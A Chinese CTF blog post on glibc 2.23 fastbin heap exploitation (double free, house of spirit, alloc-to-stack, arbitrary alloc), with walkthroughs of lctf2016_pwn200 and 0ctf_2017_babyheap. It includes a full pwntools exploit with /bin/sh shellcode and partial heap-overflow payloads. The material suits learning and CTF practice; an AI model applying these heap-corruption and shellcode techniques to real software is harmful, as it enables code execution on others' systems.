<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0,viewport-fit=cover"><title>fastbin_attack | 鱼非愚</title><meta name="author" content="鱼非愚"><meta name="copyright" content="鱼非愚"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="fastbin_attack这里的版本是2.23的glibc double freedouble free就是在一个函数中重复free了一个chunk 假设有这样的函数 1234567*p1&#x3D;malloc(0x10) ; &#x2F;&#x2F;chunk1*p2&#x3D;malloc(0x10);*p3&#x3D;malloc(0x10);free(p1);free(p2);free(p3);  这个时候fastbin中的指针会是这">
<meta property="og:type" content="article">
<meta property="og:title" content="fastbin_attack">
<meta property="og:url" content="http://example.com/2024/10/08/fastbin-attack/index.html">
<meta property="og:site_name" content="鱼非愚">
<meta property="og:description" content="fastbin_attack这里的版本是2.23的glibc double freedouble free就是在一个函数中重复free了一个chunk 假设有这样的函数 1234567*p1&#x3D;malloc(0x10) ; &#x2F;&#x2F;chunk1*p2&#x3D;malloc(0x10);*p3&#x3D;malloc(0x10);free(p1);free(p2);free(p3);  这个时候fastbin中的指针会是这">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://www.dmoe.cc/random.php?type=bg&ctype=acg?3138">
<meta property="article:published_time" content="2024-10-08T12:32:20.000Z">
<meta property="article:modified_time" content="2024-12-11T11:55:38.369Z">
<meta property="article:author" content="鱼非愚">
<meta property="article:tag" content="heap">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://www.dmoe.cc/random.php?type=bg&ctype=acg?3138"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="http://example.com/2024/10/08/fastbin-attack/index.html"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox/fancybox.min.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = {
  root: '/',
  algolia: {"appId":"IFZTL6MGHC","apiKey":"86cdc3fd8aa064b111245d76ee04a062","indexName":"hexo","hits":{"per_page":10},"languages":{"input_placeholder":"搜索文章","hits_empty":"找不到您查询的内容：${query}","hits_stats":"找到 ${hits} 条结果，用时 ${time} 毫秒"}},
  localSearch: {"path":"/search.xml","preload":true,"top_n_per_article":1,"unescape":false,"languages":{"hits_empty":"找不到您查询的内容：${query}","hits_stats":"共找到 ${hits} 篇文章"}},
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlight.js","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: true
  },
  runtime: '',
  dateSuffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  infinitegrid: {
    js: 'https://cdn.jsdelivr.net/npm/@egjs/infinitegrid/dist/infinitegrid.min.js',
    buttonText: '加载更多'
  },
  isPhotoFigcaption: true,
  islazyload: false,
  isAnchor: false,
  percent: {
    toc: true,
    rightside: true,
  },
  autoDarkmode: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: 'fastbin_attack',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2024-12-11 19:55:38'
}</script><script>(win=>{
      win.saveToLocal = {
        set: (key, value, ttl) => {
          if (ttl === 0) return
          const now = Date.now()
          const expiry = now + ttl * 86400000
          const item = {
            value,
            expiry
          }
          localStorage.setItem(key, JSON.stringify(item))
        },
      
        get: key => {
          const itemStr = localStorage.getItem(key)
      
          if (!itemStr) {
            return undefined
          }
          const item = JSON.parse(itemStr)
          const now = Date.now()
      
          if (now > item.expiry) {
            localStorage.removeItem(key)
            return undefined
          }
          return item.value
        }
      }
    
      win.getScript = (url, attr = {}) => new Promise((resolve, reject) => {
        const script = document.createElement('script')
        script.src = url
        script.async = true
        script.onerror = reject
        script.onload = script.onreadystatechange = function() {
          const loadState = this.readyState
          if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
          script.onload = script.onreadystatechange = null
          resolve()
        }

        Object.keys(attr).forEach(key => {
          script.setAttribute(key, attr[key])
        })

        document.head.appendChild(script)
      })
    
      win.getCSS = (url, id = false) => new Promise((resolve, reject) => {
        const link = document.createElement('link')
        link.rel = 'stylesheet'
        link.href = url
        if (id) link.id = id
        link.onerror = reject
        link.onload = link.onreadystatechange = function() {
          const loadState = this.readyState
          if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
          link.onload = link.onreadystatechange = null
          resolve()
        }
        document.head.appendChild(link)
      })
    
      win.activateDarkMode = () => {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      win.activateLightMode = () => {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
        }
      }
      const t = saveToLocal.get('theme')
    
        if (t === 'dark') activateDarkMode()
        else if (t === 'light') activateLightMode()
      
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
      const detectApple = () => {
        if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
          document.documentElement.classList.add('apple')
        }
      }
      detectApple()
    })(window)</script><link rel="stylesheet" href="/css/custom.css" media="defer" onload="this.media='all'"><link rel="stylesheet" href="/css/custom.css"><link rel="stylesheet" href="/css/nav.css"><!-- hexo injector head_end start --><link rel="stylesheet" href="https://cdn.cbd.int/hexo-butterfly-clock-anzhiyu/lib/clock.min.css" /><link rel="stylesheet" href="https://npm.elemecdn.com/hexo-butterfly-footer-beautify@1.0.0/lib/runtime.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/Zfour/Butterfly-double-row-display@1.00/cardlistpost.min.css"/>
<style>#recent-posts > .recent-post-item >.recent-post-info > .article-meta-wrap > .tags:before {content:"\A";
  white-space: pre;}#recent-posts > .recent-post-item >.recent-post-info > .article-meta-wrap > .tags > .article-meta__separator{display:none}</style>
<link rel="stylesheet" href="https://npm.elemecdn.com/hexo-butterfly-swiper/lib/swiper.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://npm.elemecdn.com/hexo-butterfly-swiper/lib/swiperstyle.css" media="print" onload="this.media='all'"><!-- hexo injector head_end end --><meta name="generator" content="Hexo 7.0.0"></head><body><div id="web_bg"></div><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="https://i.postimg.cc/kGHRZvgj/4k.jpg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="sidebar-site-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">53</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">16</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">10</div></a></div><hr class="custom-hr"/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fa fa-heartbeat"></i><span> 链接</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></li><li><a class="site-page child" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></li></ul></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('https://www.dmoe.cc/random.php?type=bg&amp;ctype=acg?3138')"><nav id="nav"><span id="blog-info"><a href="/" title="鱼非愚"><span class="site-name">鱼非愚</span></a></span><div id="menus"><div id="search-button"><a class="site-page social-icon search" href="javascript:void(0);"><i class="fas fa-search fa-fw"></i><span> 搜索</span></a></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fa fa-heartbeat"></i><span> 链接</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></li><li><a class="site-page child" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></li></ul></div></div><div id="toggle-menu"><a class="site-page" href="javascript:void(0);"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">fastbin_attack</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2024-10-08T12:32:20.000Z" title="发表于 2024-10-08 20:32:20">2024-10-08</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2024-12-11T11:55:38.369Z" title="更新于 2024-12-11 19:55:38">2024-12-11</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/pwn-%E5%A0%86%E5%AD%A6%E4%B9%A0/">pwn-堆学习</a></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="fastbin_attack"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"><i class="fa-solid fa-spinner fa-spin"></i></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><h1 id="fastbin-attack"><a href="#fastbin-attack" class="headerlink" title="fastbin_attack"></a>fastbin_attack</h1><p>这里的版本是2.23的glibc</p>
<h2 id="double-free"><a href="#double-free" class="headerlink" title="double free"></a>double free</h2><p>double free就是在一个函数中重复free了一个chunk</p>
<p>假设有这样的函数</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">*p1=malloc(0x10) ; //chunk1</span><br><span class="line">*p2=malloc(0x10);</span><br><span class="line">*p3=malloc(0x10);</span><br><span class="line"></span><br><span class="line">free(p1);</span><br><span class="line">free(p2);</span><br><span class="line">free(p3);</span><br></pre></td></tr></table></figure>

<p>这个时候fastbin中的指针会是这个样子</p>
<p>fastbin[20]–&gt;chunk3—&gt;chunk2—-&gt;chunk1</p>
<p>这个时候如果我们这样</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">*p1=malloc(0x10) ; //chunk1</span><br><span class="line">*p2=malloc(0x10);  //chunk2</span><br><span class="line"></span><br><span class="line">free(p1);</span><br><span class="line">free(p2);</span><br><span class="line">free(p1);</span><br></pre></td></tr></table></figure>

<p>fastbin[20]–&gt;chunk1—&gt;chunk2&lt;—-chunk1</p>
<p>这个时候molloc(0x10)</p>
<p>改写chunk1中的fd的地址使其指到bss段</p>
<p>这样</p>
<p>fastbin[20]–&gt;chunk2—&gt;chunk1—&gt;bss</p>
<p>连续malloc三次就可以得到一个可读可写的heap段</p>
<h2 id="house-of-spirit"><a href="#house-of-spirit" class="headerlink" title="house of spirit"></a>house of spirit</h2><p>这个利用手段就是通过溢出等手段，直接free一个地址（没有被malloc）自己伪造的堆块，后面在molloc回来，这样，你就获得了那块位置的读写权，如果你伪造的地址处放着rbp,就可以放system &#x2F;binsh\x00了</p>
<p>伪造堆块的检查条件有几个</p>
<p>1.fake_chunk的ISMMAP的位置不能是1，不然系统就会认为这个heap是mmap的chunk导致一些错误</p>
<p>2.地址要对齐，如XXX0,XXXX8(64位)</p>
<p>3.fake_chunk的大小有限制</p>
<blockquote>
<p>伪造 <code>fake_chunk</code> 时，大小必须是 <code>2 * SIZE_SZ</code> 的倍数。如果申请的内存大小不是 <code>2 * SIZE_SZ</code> 的整数倍，会自动调整为最小的符合要求的倍数。32 位系统中，<code>SIZE_SZ</code> 为 4，64 位系统中为 8。chunk 大小最大不能超过 <code>av-&gt;system_mem</code>（128KB）。</p>
<p>为了确保伪造的 chunk 能挂在 <code>fastbin</code> 中，<code>next_chunk</code> 的大小通常设置为略大于 <code>fastbin</code> 最大值，但小于 128KB。这样在 chunk 释放时，伪造的 chunk 会插入 <code>fastbin</code>，随后可以通过再次分配相同大小的块来控制伪造的 chunk</p>
</blockquote>
<h3 id="例题：lctf2016-pwn200"><a href="#例题：lctf2016-pwn200" class="headerlink" title="例题：lctf2016_pwn200"></a>例题：<a target="_blank" rel="noopener" href="https://buuoj.cn/challenges#lctf2016_pwn200">lctf2016_pwn200</a></h3><p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954704.png" alt="2-0"></p>
<p>保护全关</p>
<p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954705.png" alt="2-3"></p>
<p>第一个函数，也就是who are u?这里存在off by one的漏洞，可以通过溢出倒是v2把后面的地址泄露出来</p>
<p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954706.png" alt="2-1"></p>
<p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954707.png" alt="2-2"></p>
<p>这里可以看到会泄露出0x7ffc3777ed10这个地址</p>
<p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954708.png" alt="2-4"></p>
<p>这里我们打印出来了泄露的地址的，因为我们写入的地址在栈上同样可以看见，我们直接计算这两地址之间的偏移(0x7ffed1ee3160-0x7ffed1ee3110)，从而直接得到我们输入位置的地址（后面直接在开始的地址写入shellcode），之后方便直接调用</p>
<p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954709.png" alt="2-5"></p>
<p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954710.png" alt="2-6"></p>
<p>这里buf有个溢出，可以溢出到dest处</p>
<p>从而可以直接决定ptr这个变量的内容（free函数是free这个变量）</p>
<p><strong>这个就是我们house of spirit漏洞的核心点</strong></p>
<p>接下来我们要伪造堆块了</p>
<p>我们先要看give me your id ~~?”后面的值在哪</p>
<p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954711.png" alt="2-7"></p>
<p>这里选择输入123泄露位置</p>
<p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954712.png" alt="2-8"></p>
<p>这里可以看到我们输入的bbbbbbbbcccccccc</p>
<p>看到123（0x7b）的位置在0x7ffdd80a3638处（可以控制）</p>
<p>而我们的溢出点替换掉dest的点在0x7ffdd80a3608处（伪造chunkd的地址）</p>
<p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954713.png" alt="2-10"></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/haidragon/p/17016393.html">图片来源</a></p>
<p>上面这张图片里面0x40前面我们可以控制，0x70处我们同样可以控制，可以在这里伪造一个fake_chunk，为了让0x70处就是next_chunk的previse_size(绕过检查),我们伪造的chunk大小应该是0x41就刚刚好</p>
<p>因此伪造chunk的地址是0x30处，经过gdb调试时rbp-0x90</p>
<p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954714.png" alt="2-11"></p>
<p>在free后面，我们可以看到，我们本来的chunk没有被free掉，但是此时fastbin里面有地址，就是我们伪造的chunk</p>
<p>free掉后我们在把chunk malloc回来</p>
<p>这样我们就可以改写这个堆块了</p>
<p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954715.png" alt="2-12"></p>
<p>这里看到read在buf处</p>
<p>在函数结束后的rbp是buf+0x10</p>
<p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954716.png" alt="2-13"></p>
<p>所以我们的返回地址应该是buf+0x18处，也就是前面写好的shellcode的位置</p>
<p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954717.png" alt="2-14"></p>
<p>最后放上这个题目的exp</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">context(log_level=&#x27;debug&#x27;,os=&#x27;linux&#x27;,arch=&#x27;amd64&#x27;)</span><br><span class="line">p=process(&#x27;./pwn&#x27;)</span><br><span class="line">#p=remote(&#x27;node5.buuoj.cn&#x27;,27147)</span><br><span class="line">def debug():</span><br><span class="line">    gdb.attach(p)</span><br><span class="line">    pause()</span><br><span class="line"></span><br><span class="line">debug()</span><br><span class="line"></span><br><span class="line">sh=b&#x27;\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05&#x27;</span><br><span class="line">payload=sh+ (0x30- len(sh))*b&#x27;a&#x27;</span><br><span class="line"></span><br><span class="line">p.sendafter(b&#x27;u?&#x27;,payload)</span><br><span class="line">p.recvuntil(payload)</span><br><span class="line">rbp=u64(p.recv(6).ljust(8,b&#x27;\0&#x27;))</span><br><span class="line">buf_addr=rbp-0x50</span><br><span class="line">print(hex(rbp))</span><br><span class="line">print(hex(buf_addr))</span><br><span class="line"></span><br><span class="line">fake_addr=rbp-0x90</span><br><span class="line">fake_chunk=p64(0)*5+p64(0x41)+p64(0)</span><br><span class="line">fake_chunk+=p64(fake_addr)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">#fake_chunk=b&#x27;b&#x27;*0x10+b&#x27;c&#x27;*0x18+b&#x27;d&#x27;*8</span><br><span class="line"></span><br><span class="line">p.sendlineafter(b&#x27;give me your id ~~?&#x27;,b&#x27;40&#x27;)</span><br><span class="line">p.sendafter(b&#x27;give me money~&#x27;,fake_chunk)</span><br><span class="line"></span><br><span class="line">p.recvuntil(&#x27;choice : &#x27;)</span><br><span class="line">p.sendline(&#x27;2&#x27;)</span><br><span class="line"></span><br><span class="line">pause()</span><br><span class="line"></span><br><span class="line">p.recvuntil(&#x27;choice&#x27;)</span><br><span class="line">p.sendline(&#x27;1&#x27;)</span><br><span class="line">p.sendlineafter(b&#x27;how long?&#x27;,b&#x27;50&#x27;)</span><br><span class="line">payload=b&#x27;a&#x27;*0x18+p64(buf_addr)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(b&#x27;50\n&#x27;,payload)</span><br><span class="line"></span><br><span class="line">p.sendlineafter(b&#x27;our choice :&#x27;,b&#x27;3&#x27;)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>





<h2 id="Alloc-to-stack"><a href="#Alloc-to-stack" class="headerlink" title="Alloc_to_stack"></a>Alloc_to_stack</h2><p>这个漏洞就是在改写chunk的fd指针为想要的地址，从而达到想要地址伪造堆块，从而改写rbp等….</p>
<p>拿wiki上面的代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">#include&lt;stdio.h&gt;</span><br><span class="line">#include&lt;stdlib.h&gt;</span><br><span class="line"></span><br><span class="line">typedef struct _chunk</span><br><span class="line">&#123;</span><br><span class="line">    long long pre_size;</span><br><span class="line">    long long size;</span><br><span class="line">    long long fd;</span><br><span class="line">    long long bk;</span><br><span class="line">&#125; CHUNK,*PCHUNK;</span><br><span class="line"></span><br><span class="line">int main(void)</span><br><span class="line">&#123;</span><br><span class="line">    CHUNK stack_chunk;</span><br><span class="line"></span><br><span class="line">    void *chunk1;</span><br><span class="line">    void *chunk_a;</span><br><span class="line"></span><br><span class="line">    stack_chunk.size=0x21;</span><br><span class="line">    chunk1=malloc(0x10);</span><br><span class="line"></span><br><span class="line">    free(chunk1);</span><br><span class="line"></span><br><span class="line">    *(long long *)chunk1=&amp;stack_chunk;</span><br><span class="line">    malloc(0x10);</span><br><span class="line">    chunk_a=malloc(0x10);</span><br><span class="line">    printf(&quot;%p&quot;,chunk_a);</span><br><span class="line">    return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<p> gcc test.c -o test -O0 -g -z execstack -z norelro -fno-stack-protector -no-pie</p>
<p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954718.png" alt="3-1"></p>
<p>这里断在free前面，可以看到申请了一个chunk</p>
<p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954719.png" alt="3-2"></p>
<p>free掉之后，被放到了fastbin里面去</p>
<p>接着改写了chunk1的fd指针</p>
<p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954720.png" alt="3-3"></p>
<p>可以看到fd指针改变后，fastbin里面的链表也发生了变化</p>
<p>接着连续malloc两个chunk</p>
<p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954721.png" alt="3-4"></p>
<p>可以看到我们输入的fd处成功成为了一个堆块</p>
<h2 id="Arbitrary-Alloc"><a href="#Arbitrary-Alloc" class="headerlink" title="Arbitrary Alloc"></a>Arbitrary Alloc</h2><p>这个的利用方法和前面的的alloc_to_stack一样，就是把stack的地址改成了其他段的地址，然后通过改变指定的函数地址获得shell</p>
<h3 id="例题：0ctf-2017-babyheap"><a href="#例题：0ctf-2017-babyheap" class="headerlink" title="例题：0ctf_2017_babyheap"></a>例题：0ctf_2017_babyheap</h3><p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954722.png" alt="4-1"></p>
<p>保护全开（<del>这我打个鸡毛啊</del>）</p>
<p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954723.png" alt="4-2"></p>
<p>菜单</p>
<p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954724.png" alt="4-3"></p>
<p>其他的函数挺正常的，这里在修改的位置没有限制修改的长度，存在堆溢出漏洞</p>
<h4 id="我们先创建6个堆快"><a href="#我们先创建6个堆快" class="headerlink" title="我们先创建6个堆快"></a>我们先创建6个堆快</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">allo(0x10)</span><br><span class="line">allo(0x10)</span><br><span class="line">allo(0x10)</span><br><span class="line">allo(0x10)</span><br><span class="line">allo(0x80)</span><br><span class="line">allo(0x70)</span><br></pre></td></tr></table></figure>



<p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954725.png" alt="4-4"></p>
<p>前四个用来溢出</p>
<p>第五个用来泄露main_arena的地址</p>
<p>第六个用来防止chunk之间的合并</p>
<h4 id="先释放第三个堆块，再释放第二个堆快"><a href="#先释放第三个堆块，再释放第二个堆快" class="headerlink" title="先释放第三个堆块，再释放第二个堆快"></a>先释放第三个堆块，再释放第二个堆快</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">free(2)</span><br><span class="line"></span><br><span class="line">free(1)</span><br></pre></td></tr></table></figure>



<p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954726.png" alt="4-5"></p>
<p>这里看到bin中的链表</p>
<h4 id="我们通过chunk0进行堆溢出，使chunk1-chunk5"><a href="#我们通过chunk0进行堆溢出，使chunk1-chunk5" class="headerlink" title="我们通过chunk0进行堆溢出，使chunk1-&gt;chunk5"></a>我们通过chunk0进行堆溢出，使chunk1-&gt;chunk5</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">payload=p64(0)*3+p64(0x21)+p8(0x80)</span><br><span class="line">pause()</span><br><span class="line">fill(0,len(payload),payload)</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954727.png" alt="4-6"></p>
<h4 id="我们再把chun5的size改为0x20，不让接下来无法把重新申请回来"><a href="#我们再把chun5的size改为0x20，不让接下来无法把重新申请回来" class="headerlink" title="我们再把chun5的size改为0x20，不让接下来无法把重新申请回来"></a>我们再把chun5的size改为0x20，不让接下来无法把重新申请回来</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">payload1=b&#x27;a&#x27;*0x10+p64(0)+p64(0x21)</span><br><span class="line">pause()</span><br><span class="line">fill(3,len(payload1),payload1)</span><br></pre></td></tr></table></figure>



<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">allo(0x10)</span><br><span class="line"></span><br><span class="line">allo(0x10)</span><br></pre></td></tr></table></figure>





<p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954728.png" alt="4-7"></p>
<p>我们要找到这些堆快的返回地址储存再哪</p>
<p>vmmap看一下</p>
<p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954729.png" alt="4-8"></p>
<p>第一个段有异常，硬找</p>
<p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954730.png" alt="4-9"></p>
<p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954731.png" alt="4-10"></p>
<p>找到了</p>
<p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954732.png" alt="4-11"></p>
<p>两边进行对照，发现chunk2的返回地址被改写成了我们chunk4的</p>
<h4 id="改回chunk4的大小，并释放"><a href="#改回chunk4的大小，并释放" class="headerlink" title="改回chunk4的大小，并释放"></a>改回chunk4的大小，并释放</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">payload1=b&#x27;a&#x27;*0x10+p64(0)+p64(0x91)</span><br><span class="line">pause()</span><br><span class="line">fill(3,len(payload1),payload1)</span><br><span class="line"></span><br><span class="line">free(4)</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-yfy.oss-cn-wuhan-lr.aliyuncs.com/202412111954733.png" alt="4-12"></p>
<p>这是，虽然我们chunk4的地址被释放了，不能使用，但是我们chunk2 也是指向我们chunk4地址的</p>
